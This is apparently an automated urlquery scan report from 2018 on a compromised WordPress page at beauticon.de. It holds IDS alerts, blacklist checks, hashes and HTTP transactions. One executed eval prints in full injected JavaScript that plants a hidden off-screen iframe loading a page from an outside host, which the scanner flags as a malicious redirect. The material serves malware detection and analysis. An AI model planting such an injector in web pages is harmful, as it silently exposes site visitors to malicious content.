Overview

URL beauticon.de/WordPress/?page_id=952
IP213.160.71.78
ASNAS12574 http.net Internet GmbH
Location Germany
Report completed2018-10-11 22:26:20 CEST
StatusLoading report..
urlquery Alerts Malicious redirection script
Redirected URL from malicious script
Suspicious javascript obfuscation


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Pool
Access Level


Intrusion Detection Systems

Suricata /w Emerging Threats Pro
Timestamp Severity Source IP Destination IP Alert
2018-10-11 22:25:46 CEST 2  213.160.71.78 Client IP ET INFO Obfuscated Split String (Double Q) 11


Blacklists

MDL  No alerts detected
OpenPhish  No alerts detected
PhishTank  No alerts detected
Fortinet's Web Filter  No alerts detected
DNS-BH  No alerts detected
mnemonic secure dns  No alerts detected


Recent reports on same IP/ASN/Domain

Last 10 reports on IP: 213.160.71.78

Date UQ / IDS / BL URL IP
2018-11-13 14:34:08 +0100
5 - 2 - 1 beauticon.de/ 213.160.71.78
2018-10-13 13:42:11 +0200
5 - 1 - 0 beauticon.de/WordPress/?cat=62 213.160.71.78
2018-10-11 14:34:02 +0200
5 - 1 - 0 beauticon.de/WordPress/?page_id=577 213.160.71.78
2018-10-11 11:51:09 +0200
5 - 0 - 0 beauticon.de/WordPress/?m=201201 213.160.71.78
2018-10-10 07:01:33 +0200
5 - 1 - 0 beauticon.de/WordPress/?cat=60 213.160.71.78
2018-05-22 11:43:46 +0200
5 - 2 - 2 beauticon.de/ 213.160.71.78
2018-05-03 20:38:16 +0200
5 - 1 - 1 beauticon.de/WordPress/?page_id=577 213.160.71.78
2018-01-05 01:01:47 +0100
0 - 0 - 1 www.amp-rock.de/amp_header.swf 213.160.71.78
2017-11-26 15:20:28 +0100
5 - 2 - 2 beauticon.de/ 213.160.71.78
2017-11-08 09:36:44 +0100
5 - 0 - 2 beauticon.de/ 213.160.71.78

Last 10 reports on ASN: AS12574 http.net Internet GmbH

Date UQ / IDS / BL URL IP
2018-12-08 10:38:15 +0100
0 - 0 - 1 herrentor.de/delphi/schichtbuch.exe 213.160.71.70
2018-12-08 10:37:32 +0100
0 - 1 - 1 herrentor.de/delphi/massentraegheitsmomente.exe 213.160.71.70
2018-12-07 22:13:32 +0100
0 - 0 - 1 trendesigner.de/index.php/impressum 213.160.71.82
2018-12-07 20:40:44 +0100
0 - 0 - 1 trendesigner.de/index.php/impressum 213.160.71.82
2018-12-01 15:17:04 +0100
0 - 0 - 1 trendesigner.de/index.php/referenzen 213.160.71.82
2018-11-27 22:44:44 +0100
0 - 0 - 1 trendesigner.de/index.php 213.160.71.82
2018-11-25 13:44:35 +0100
0 - 0 - 1 trendesigner.de/index.php 213.160.71.82
2018-11-25 11:27:42 +0000
0 - 0 - 1 trendesigner.de/index.php/2-uncategorised/5-home 213.160.71.82
2018-11-24 17:18:30 +0100
0 - 0 - 1 trendesigner.de/index.php/2-uncategorised/5-home 213.160.71.82
2018-11-13 14:34:08 +0100
5 - 2 - 1 beauticon.de/ 213.160.71.78

Last 10 reports on domain: beauticon.de

Date UQ / IDS / BL URL IP
2018-11-13 14:34:08 +0100
5 - 2 - 1 beauticon.de/ 213.160.71.78
2018-10-13 13:42:11 +0200
5 - 1 - 0 beauticon.de/WordPress/?cat=62 213.160.71.78
2018-10-11 14:34:02 +0200
5 - 1 - 0 beauticon.de/WordPress/?page_id=577 213.160.71.78
2018-10-11 11:51:09 +0200
5 - 0 - 0 beauticon.de/WordPress/?m=201201 213.160.71.78
2018-10-10 07:01:33 +0200
5 - 1 - 0 beauticon.de/WordPress/?cat=60 213.160.71.78
2018-05-22 11:43:46 +0200
5 - 2 - 2 beauticon.de/ 213.160.71.78
2018-05-03 20:38:16 +0200
5 - 1 - 1 beauticon.de/WordPress/?page_id=577 213.160.71.78
2017-11-26 15:20:28 +0100
5 - 2 - 2 beauticon.de/ 213.160.71.78
2017-11-08 09:36:44 +0100
5 - 0 - 2 beauticon.de/ 213.160.71.78
2017-10-23 11:54:52 +0200
5 - 2 - 2 beauticon.de/ 213.160.71.78


JavaScript

Executed Scripts (1)


Executed Evals (51)

#1 JavaScript::Eval (size: 588, repeated: 1) - SHA256: 6c74f87a47443ce3d2ac1e87c5dac96c5ce5536c3d2f3288b48b53d5817314f4

                                        		if (document.getElementsByTagName('body')[0]) {
		    iframer();
		} else {
		    document.write("<iframe src='http://lfmonline.de/test/test.php' width='100' height='100' style='width:100px;height:100px;position:absolute;left:-10000px;top:0;'></iframe>");
		}

		function iframer() {
		    var f = document.createElement('iframe');
		    f.setAttribute('src', 'http://lfmonline.de/test/test.php');
		    f.style.left = '-10000px';
		    f.style.top = '0';
		    f.style.position = 'absolute';
		    f.style.top = '0';
		    f.setAttribute('width', '100');
		    f.setAttribute('height', '100');
		    document.getElementsByTagName('body')[0].appendChild(f);
		}
                                    

#2 JavaScript::Eval (size: 3, repeated: 22) - SHA256: b8ad1bd2ff50021ff6a1239585cc9ccde31e70072299c3cc910da54f9e791f7c

                                        0x0
                                    

#3 JavaScript::Eval (size: 4, repeated: 11) - SHA256: a99eeb77c2d424e49c0bf34e7729c2821d5d62edba7093a10b09c7cdaafe1d8d

                                        0x17
                                    

#4 JavaScript::Eval (size: 4, repeated: 2) - SHA256: 6e003609f0b74b2cd53b48306ac894c37be647d817fc85090fb3addf8ba4e3f5

                                        0x19
                                    

#5 JavaScript::Eval (size: 4, repeated: 34) - SHA256: 1cbb1f1ecd26b280ecd618ca68c904736b380ea4c4d864c620da00233031a3b5

                                        0x1e
                                    

#6 JavaScript::Eval (size: 4, repeated: 11) - SHA256: 922783559b2a7bbad9720fdfd9cc6b5419c1ce5fcf5dd43bf35ef8c0bfb06ec0

                                        0x1f
                                    

#7 JavaScript::Eval (size: 4, repeated: 11) - SHA256: a766b7b336b982ec85609aa5fe6b51e33e87b879398183ae546a96138a61402a

                                        0x20
                                    

#8 JavaScript::Eval (size: 4, repeated: 3) - SHA256: a029fa5272890455a79514eb5c69906b328662b69d00da32940acc90a323e155

                                        0x23
                                    

#9 JavaScript::Eval (size: 4, repeated: 2) - SHA256: eb21d48944a211681df63be8d6a1a0a7a3724904bfcabda1a9b7e2f0985c3be3

                                        0x24
                                    

#10 JavaScript::Eval (size: 4, repeated: 20) - SHA256: 2611a8bbf45f1e07fbab421582b1d2232d1e7eed014ee50f369dc8bc82ca4144

                                        0x25
                                    

#11 JavaScript::Eval (size: 4, repeated: 9) - SHA256: 50d190489dcb2de310aeaaf59e72d05cb1931d3f1aecfa234e8661d712fd7e7e

                                        0x26
                                    

#12 JavaScript::Eval (size: 4, repeated: 25) - SHA256: d7ec68c14ab4ae014871054cfccc2c295836f5d672de268126bac805f45b8395

                                        0x27
                                    

#13 JavaScript::Eval (size: 4, repeated: 8) - SHA256: eab9c4ff675d2ef3bf22d1783cfa75421c6724a56c76015f9476a3966aaa103a

                                        0x28
                                    

#14 JavaScript::Eval (size: 4, repeated: 7) - SHA256: 91213e32b8152dbca286a6e58d8213bdfef260d2c84704f31d543d35160abba3

                                        0x31
                                    

#15 JavaScript::Eval (size: 4, repeated: 16) - SHA256: 8b2b96ab9594c6dcc5174a7db870ab3db807272a6757da87c17fd2c2d9709ddd

                                        0x32
                                    

#16 JavaScript::Eval (size: 4, repeated: 2) - SHA256: 8ffb568d166d1a89c2f540cd8d8f573d06c529148c3ec817a8f079d09b8c802d

                                        0x33
                                    

#17 JavaScript::Eval (size: 4, repeated: 9) - SHA256: 806ec2d1106273cf8bfde61eccf4fe1c539f429af78abf41a754d38f7967cec8

                                        0x34
                                    

#18 JavaScript::Eval (size: 4, repeated: 2) - SHA256: b555f2604ff070ea9c11c237e061433b34cdc027e838c8302218e87bbb548a85

                                        0x35
                                    

#19 JavaScript::Eval (size: 4, repeated: 3) - SHA256: ae4f9cbc9a1da8f55d7d779c990a4fc009a93bf74fadc7b9a53f1da6f081ece8

                                        0x38
                                    

#20 JavaScript::Eval (size: 4, repeated: 2) - SHA256: f66682a022e72b3ea7bd4c3fbc947ead7a0458be9298bc32796565b416c40bfe

                                        0x39
                                    

#21 JavaScript::Eval (size: 4, repeated: 1) - SHA256: 490fe426bc0f989b55508663f7038c8a1e0c86fdb044f013c8a345c9c9323da4

                                        0x3a
                                    

#22 JavaScript::Eval (size: 4, repeated: 3) - SHA256: 41502a8060896619337477260868d0a7712504e20fbde0662bee94b2317738e8

                                        0x3c
                                    

#23 JavaScript::Eval (size: 3, repeated: 8) - SHA256: eb87417d8bd9691b4b39d7be34a3c03c7ceb70803d21b2b341c5b002947c7589

                                        0x4
                                    

#24 JavaScript::Eval (size: 4, repeated: 2) - SHA256: 17a03370befc99702d1d239fe5be945c4bc1e1eb86562b24fd26752a758f7e8a

                                        0x45
                                    

#25 JavaScript::Eval (size: 4, repeated: 2) - SHA256: 969d96a495d5539af1edcb60af0f617a4f90caa06f00b05df7347524a170c02d

                                        0x4b
                                    

#26 JavaScript::Eval (size: 4, repeated: 2) - SHA256: ee58c78136e00359c9629ec86082e591982530503c40a6d7d7e79681407730b6

                                        0x52
                                    

#27 JavaScript::Eval (size: 4, repeated: 2) - SHA256: 943397cff73339e4bd8832d0a2a00b2ce6246f6d2922e933647d6025e66b25d5

                                        0x54
                                    

#28 JavaScript::Eval (size: 4, repeated: 14) - SHA256: 08fb0f77b940850c575151031f8f5114390ecb8239d970ae2ab324cd83be51a8

                                        0x58
                                    

#29 JavaScript::Eval (size: 4, repeated: 7) - SHA256: aeef619a3f00df1564e22ac561f6b972c898f95b46f6eca83cd40c68863fcde2

                                        0x59
                                    

#30 JavaScript::Eval (size: 4, repeated: 8) - SHA256: a42c227cfcb3fe3b0c212b8f6b5785000da2f21d791e003ce5f085b8328a308b

                                        0x5a
                                    

#31 JavaScript::Eval (size: 4, repeated: 13) - SHA256: 5e8749076dd04fbf836e3e703b3188cd5bd715f8c0dc5c9b204e2973fefd8815

                                        0x5b
                                    

#32 JavaScript::Eval (size: 4, repeated: 51) - SHA256: f9cc5aa0cbc55ab9b0d8572ae62581477050eef3208d2b7bd72764fc2d0a8f83

                                        0x5c
                                    

#33 JavaScript::Eval (size: 4, repeated: 20) - SHA256: a8c59219803236d9f2b1087512765fc92fd866e13c2405dc6d31d80fe8adeee0

                                        0x5d
                                    

#34 JavaScript::Eval (size: 4, repeated: 7) - SHA256: 521db52f84b0541b2df3c8ab252b9992f0bee9edbdc354a521a19d68eb75a108

                                        0x5e
                                    

#35 JavaScript::Eval (size: 4, repeated: 14) - SHA256: e7a1774b442836712063da64e35c9a6fde0c5648f7b1ce3f62be1b6b42139946

                                        0x5f
                                    

#36 JavaScript::Eval (size: 4, repeated: 24) - SHA256: 3d6eaef209735c156a9f260077539bd52306c0a8e11b18308cbb88dd122203af

                                        0x60
                                    

#37 JavaScript::Eval (size: 4, repeated: 18) - SHA256: a6c67832a9e4c93949db58d4d71d5a542d2022826113de96f5ed0172fca1ff2f

                                        0x63
                                    

#38 JavaScript::Eval (size: 4, repeated: 16) - SHA256: 3246db8452b23cceef2b8916bff7009fb58022915e5951f59980f0536c57a989

                                        0x64
                                    

#39 JavaScript::Eval (size: 4, repeated: 16) - SHA256: 0237c079965c2850200f7ca05198631894ffb0e67f7a1daa443e67b027a17c35

                                        0x65
                                    

#40 JavaScript::Eval (size: 4, repeated: 18) - SHA256: 409eec787e451a32cc503ca4032b0189c4faa9669f7a7bfc0c53a8eff652f241

                                        0x66
                                    

#41 JavaScript::Eval (size: 4, repeated: 17) - SHA256: 6ae1c5e37e064a67970ce6fcce77bb516f0ad1d53e6676b7dc25c74db9f9bec6

                                        0x67
                                    

#42 JavaScript::Eval (size: 4, repeated: 15) - SHA256: 317200ff7d14d14bda58a2b293dd57b9a96dbbbffdfc216d0e8a659920c83e51

                                        0x69
                                    

#43 JavaScript::Eval (size: 4, repeated: 21) - SHA256: eb3ed4474da55652541b30cca997622a04944652d06af6e9a5dd292294c61452

                                        0x6a
                                    

#44 JavaScript::Eval (size: 4, repeated: 56) - SHA256: ab8fcc4094e2b41abe4b3a0f102f699a0b2849d1c952e3ac3fb93505252f0b1d

                                        0x6b
                                    

#45 JavaScript::Eval (size: 4, repeated: 10) - SHA256: 3cd48887076191620c4308a3787b3a64edd3cc1628298f3708178c6874a20000

                                        0x6c
                                    

#46 JavaScript::Eval (size: 4, repeated: 1) - SHA256: cae472aa1a614ef9e3847e1abc5c9557018baea5460e7d05300df3441a5143c0

                                        0x6d
                                    

#47 JavaScript::Eval (size: 4, repeated: 4) - SHA256: d92072faecd4495ba9bf9e7ee14182ba59f5ab078ace9494560734f4cf7591a7

                                        0x6e
                                    

#48 JavaScript::Eval (size: 4, repeated: 4) - SHA256: f59f28d098703c988473ea55c2b04e5c88325d08786ad97243c1458f4090854a

                                        0x6f
                                    

#49 JavaScript::Eval (size: 4, repeated: 9) - SHA256: b0f6136292266f5a55b41125b55ec719c33ab9547b5a6ef3f1fa2d51661e4ea3

                                        0x70
                                    

#50 JavaScript::Eval (size: 4, repeated: 3) - SHA256: c78d834dfbaf90031582f25bc4553ae357863fadd0994825ddf160fbd54a9262

                                        0x72
                                    

#51 JavaScript::Eval (size: 4, repeated: 3) - SHA256: d29823cb11e3d06102c31e6a1e0e080d62ecd7d7845530b64bb45ecbba6e06e0

                                        0x74
                                    

Executed Writes (0)



HTTP Transactions (12)


Request Response
                                        
                                            GET /WordPress/?page_id=952 HTTP/1.1 
Host: beauticon.de
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         213.160.71.78
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Date: Thu, 11 Oct 2018 20:25:46 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Server: Apache/2.4.33 (Unix)
X-Pingback: http://beauticon.de/WordPress/xmlrpc.php
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   6239
Md5:    3be3e7773e53be1c6b3de124d46a495e
Sha1:   ef9a59eefbc596ca5f79359271cd7513f312351b
Sha256: 3c7c661c5c9d783c458c74e5be00fe5c844755ccadf24d35ee9b0662b4fd5121

Alerts:
  urlquery:
    - Suspicious javascript obfuscation
  IDS:
    - ET INFO Obfuscated Split String (Double Q) 11
                                        
                                            GET /WordPress/wp-content/themes/natural-essence/style.css HTTP/1.1 
Host: beauticon.de
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://beauticon.de/WordPress/?page_id=952

                                         
                                         213.160.71.78
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Thu, 11 Oct 2018 20:25:46 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Server: Apache/2.4.33 (Unix)
Last-Modified: Mon, 25 Feb 2008 21:09:34 GMT
Etag: W/"17e6-44701fd1e3f80"
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   1961
Md5:    e9aa9faf2b583e8de79cade385551e45
Sha1:   cb2cb330b16125421ee0bc4f682ea897f40000e0
Sha256: 82bef573fdc70b82e35dc9c82d09dbbccb56e843baec0213576c0c4ffb53d5b5
                                        
                                            GET /WordPress/wp-content/themes/natural-essence/img/bg.jpg HTTP/1.1 
Host: beauticon.de
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://beauticon.de/WordPress/wp-content/themes/natural-essence/style.css

                                         
                                         213.160.71.78
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 11 Oct 2018 20:25:46 GMT
Content-Length: 8082
Connection: keep-alive
Server: Apache/2.4.33 (Unix)
Last-Modified: Wed, 20 Feb 2008 12:53:01 GMT
Etag: "1f92-44696781c4540"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.02
Size:   8082
Md5:    71e1925b135c2a25af7a433f50f85a9e
Sha1:   a23fb02f6b099285dd65618bf5a06ed0eaf54e59
Sha256: 929a3e97318c848170ee400fd32df853518d4ec87a869cf5af1d23f8dba3c3ab
                                        
                                            GET /WordPress/wp-content/themes/natural-essence/img/wrapper.gif HTTP/1.1 
Host: beauticon.de
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://beauticon.de/WordPress/wp-content/themes/natural-essence/style.css

                                         
                                         213.160.71.78
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Date: Thu, 11 Oct 2018 20:25:46 GMT
Content-Length: 282
Connection: keep-alive
Server: Apache/2.4.33 (Unix)
Last-Modified: Wed, 20 Feb 2008 12:54:04 GMT
Etag: "11a-446967bdd9300"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 762 x 10
Size:   282
Md5:    d1b621f85a033e2161cbbfef1411a6bb
Sha1:   dd82774b9a27f217b10784b05974ad805dab1ed9
Sha256: 77ae6522eb8aa138639ce856ec9c91fd0249a598d0eb3d7097481abb94989ef7
                                        
                                            GET /WordPress/wp-content/themes/natural-essence/img/nav.gif HTTP/1.1 
Host: beauticon.de
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://beauticon.de/WordPress/wp-content/themes/natural-essence/style.css

                                         
                                         213.160.71.78
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Date: Thu, 11 Oct 2018 20:25:46 GMT
Content-Length: 1501
Connection: keep-alive
Server: Apache/2.4.33 (Unix)
Last-Modified: Wed, 20 Feb 2008 12:53:45 GMT
Etag: "5dd-446967abba840"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 10 x 82
Size:   1501
Md5:    e705f1d831a86fc38d1b47618ea4846a
Sha1:   6f4318dc6ea5d1f4607a5e77ba29dafca125ea71
Sha256: 3aceb6fd9d2f2c20b41d948953583bb7ab5948bac1087a096dd38e871630f49c
                                        
                                            GET /WordPress/wp-content/themes/natural-essence/img/main.gif HTTP/1.1 
Host: beauticon.de
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://beauticon.de/WordPress/wp-content/themes/natural-essence/style.css

                                         
                                         213.160.71.78
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Date: Thu, 11 Oct 2018 20:25:46 GMT
Content-Length: 98
Connection: keep-alive
Server: Apache/2.4.33 (Unix)
Last-Modified: Wed, 20 Feb 2008 12:53:32 GMT
Etag: "62-4469679f54b00"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 495 x 5
Size:   98
Md5:    c1357fa5e459b3d9082cd2908ebe40f7
Sha1:   90b3aef1ebdfccb371b9d237b3ff54685c92bae1
Sha256: 2ef7d25e7cd77ddd044e05db18afe33977476ed93fe4051e6e197cec88bb2182
                                        
                                            GET /WordPress/wp-content/themes/natural-essence/img/header.jpg HTTP/1.1 
Host: beauticon.de
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://beauticon.de/WordPress/wp-content/themes/natural-essence/style.css

                                         
                                         213.160.71.78
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Thu, 11 Oct 2018 20:25:46 GMT
Content-Length: 16787
Connection: keep-alive
Server: Apache/2.4.33 (Unix)
Last-Modified: Wed, 20 Feb 2008 14:01:22 GMT
Etag: "4193-446976c8c9080"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.02
Size:   16787
Md5:    f61e38af3f2efa810d1deca5165cee4a
Sha1:   440ff3e194f39ba07f7871872ccb8b0312fe5818
Sha256: 3aa58efd5936b00364fdc49b762e931ea8344a431022c1448c24676e43db0c0e
                                        
                                            GET /WordPress/wp-content/themes/natural-essence/img/bottom.gif HTTP/1.1 
Host: beauticon.de
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://beauticon.de/WordPress/wp-content/themes/natural-essence/style.css

                                         
                                         213.160.71.78
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Date: Thu, 11 Oct 2018 20:25:46 GMT
Content-Length: 223
Connection: keep-alive
Server: Apache/2.4.33 (Unix)
Last-Modified: Wed, 20 Feb 2008 12:53:10 GMT
Etag: "df-4469678a59980"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  GIF image data, version 89a, 750 x 9
Size:   223
Md5:    32e6c4672baefacf1af3630a635cdd60
Sha1:   e32686ec113833c9deaa199740925beac1f96a2a
Sha256: cc1acb20f9e18486d08e66ef8733cb115a1bd0a62704cc41769767aa1cc9a5c7
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: beauticon.de
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         213.160.71.78
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=iso-8859-1
                                        
Date: Thu, 11 Oct 2018 20:25:49 GMT
Content-Length: 209
Connection: keep-alive
Server: Apache/2.4.33 (Unix)


--- Additional Info ---
Magic:  HTML document text\012 exported SGML document text
Size:   209
Md5:    18ffb59b61525f781cf9251045be575d
Sha1:   bd7318b00b15b7a1c8a48524419fa2e5c27a5b6d
Sha256: b6682cab65d3243b5b75efb7279dbf49491957484780f2ba0a87632cc0e25642
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: beauticon.de
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         213.160.71.78
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=iso-8859-1
                                        
Date: Thu, 11 Oct 2018 20:25:52 GMT
Content-Length: 209
Connection: keep-alive
Server: Apache/2.4.33 (Unix)


--- Additional Info ---
Magic:  HTML document text\012 exported SGML document text
Size:   209
Md5:    18ffb59b61525f781cf9251045be575d
Sha1:   bd7318b00b15b7a1c8a48524419fa2e5c27a5b6d
Sha256: b6682cab65d3243b5b75efb7279dbf49491957484780f2ba0a87632cc0e25642
                                        
                                            GET /test/test.php HTTP/1.1 
Host: lfmonline.de
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://beauticon.de/WordPress/?page_id=952

                                         
                                         0.0.0.0
                                        


--- Additional Info ---

Alerts:
  urlquery:
    - Redirected URL from malicious script
                                        
                                            GET /test/test.php HTTP/1.1 
Host: lfmonline.de
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://beauticon.de/WordPress/?page_id=952

                                         
                                         0.0.0.0
                                        


--- Additional Info ---

Alerts:
  urlquery:
    - Redirected URL from malicious script